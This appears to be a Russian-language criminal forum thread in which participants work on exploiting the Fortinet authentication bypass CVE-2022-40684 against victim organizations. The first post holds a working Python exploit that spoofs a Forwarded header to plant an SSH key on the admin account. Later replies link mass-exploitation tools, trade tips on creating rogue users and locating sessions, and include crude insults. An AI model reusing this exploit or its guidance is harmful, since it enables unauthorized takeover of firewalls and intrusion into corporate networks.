фортик

[CCod]

Всем привет.Эксплуатирую CVE-2022-40684(auth bypass в фортике).Написал такой скрипт для подгрузки своего ssh ключа:
import requests,sys

t=sys.argv[1]
headers={
"User-Agent": "Report Runner",
"Content-Type": "application/json",
"Forwarded": "for=[127.0.0.1]:8000;by=[127.0.0.1]:9000;",}

payload={"ssh-public-key1": "\"id_rsa.pub\""}
r=requests.put(t+"/api/v2/cmdb/system/admin/admin",headers=headers,data=payload,verify=False)

ключ сгенерировал так;
ssh-keygen

При попытке ssh admin@victim -i id_rsa :
nable to negotiate with victim port 22: no matching host key type found. Their offer: ssh-rsa

Как исправить?

 

[C0rtex]

странная тема, после попыток раз 10 создать юзера, к клиенту хрен подключается с ошибкой -7200, никто не шарил данный эксплоит по поводу путей в директории где лежат сессии

 

[C0rtex]

ах да я же забыл хер кто тут инфой поделится или даже станет ковырять, им все готовое нужно подавать ;D иногда есть такой интересный фактор, или тут люди срутся что то выкладывать найденную инфу, или же боятся показать то что они что то знают

 

[Wolverine]

странная тема, после попыток раз 10 создать юзера, к клиенту хрен подключается с ошибкой -7200, никто не шарил данный эксплоит по поводу путей в директории где лежат сессии

https://www.used.net.ua/index.php/fajlovyj-arkhiv/category/35-fortinet.html?download=83:fortios-5-6-11-rest-api-reference

апи ковыряю, ни сессии ни пароли , где лежат, пока не нашел

 

[C0rtex]

https://www.used.net.ua/index.php/fajlovyj-arkhiv/category/35-fortinet.html?download=83:fortios-5-6-11-rest-api-reference

апи ковыряю, ни сессии ни пароли , где лежат, пока не нашел

ну через это хрен найдешь, по любому должен быть где то бинарник такой же как и sslvpn_websession

 

[C0rtex]

где ребята ре

эххх

эхх как же вы близко да, или же эхх как же вы далеко

 

[mirnoe_vedro]

Added module for CVE-2022-40684 (FortiOS, FortiProxy, and FortiSwitchManager Authentication Bypass) by heyder · Pull Request #17143 · rapid7/metasploit-framework

This PR add a module for the CVE-2022-40684 affecting some Fortinet products and should close the issue #17121 Verification List the steps needed to make sure this thing works Start msfconsole u...

github.com

 

[C0rtex]

да это х#йня, там и так и так можно к ssh получить доступ

 

[Vendett@]

да это х#йня, там и так и так можно к ssh получить доступ

ну как? просто хоть какую то наводку, т.к у меня пустые резы

 

[pepel]

Естественный отбор в наглядном примере - кучка дебилов ждут подачки от более умной особи. Не по Сеньке шапка, пиздуйте на завод. Корпы они тут ломают, бл#ть

 

[mirnoe_vedro]

Естественный отбор в наглядном примере - кучка дебилов ждут подачки от более умной особи. Не по Сеньке шапка, пиздуйте на завод. Корпы они тут ломают, бл#ть

чел, вообще не в тему пишешь. ты там успокойся, водочки выпей, глянь первый канал и ложись спать. и не надо дичь печатать. спасибо.

 

[prox]

ну как? просто хоть какую то наводку, т.к у меня пустые резы

1. _https://github.com/carlosevieira/CVE-2022-40684
2. _https://github.com/horizon3ai/CVE-2022-40684

 

[pepel]

чел, вообще не в тему пишешь. ты там успокойся, водочки выпей, глянь первый канал и ложись спать. и не надо дичь печатать. спасибо.

Ух ты. А где в этом треде твой пост "в тему"? Многозначительный пердеж - ахахах, эхх, мсф... импакт ебануться. Успехов вам в доеданиях

 

[Vendett@]

1. _https://github.com/carlosevieira/CVE-2022-40684
2. _https://github.com/horizon3ai/CVE-2022-40684

Так это не даёт резов

 

[wav]

Так это не даёт резов

всё даёт! есть ссш значит можно создать юзера, команды только знать надо.
пс. всё точно так же как и с циско!
не сцыте скоро появится рабочий варик на гиде, для долбоящеров )))))))))

 

[Vendett@]

всё даёт! есть ссш значит можно создать юзера, команды только знать надо.
пс. всё точно так же как и с циско!
не сцыте скоро появится рабочий варик на гиде, для долбоящеров )))))))))

Да ССХ ясно дело, это понимаю, но сами Резы не идут.

 

[GoblinFK]

GitHub - Chocapikk/CVE-2022-40684: Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684) [ Mass Exploit ]

Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684) [ Mass Exploit ] - GitHub - Chocapikk/CVE-2022-40684: Fortinet Critical Authentication Bypass Vulnerability (CVE-2022-40684) [...

github.com

 

[tuda]

> fortios_7_2_1 #

ну а че писать то, в консоли той

 

[GoblinFK]

> fortios_7_2_1 #

ну а че писать то, в консоли той

добавить Юзера каким то образом )

 

[Pulp Fiction]

Естественный отбор в наглядном примере - кучка дебилов ждут подачки от более умной особи. Не по Сеньке шапка, пиздуйте на завод. Корпы они тут ломают, бл#ть

Что-бы пойти на завод необходимо закончить хотя-бы ПТУ!

 

[wav]

Что-бы пойти на завод необходимо закончить хотя-бы ПТУ!

не щас туда берут всех дэбилов, прям там и научат как кувалду в руках держать и лом )))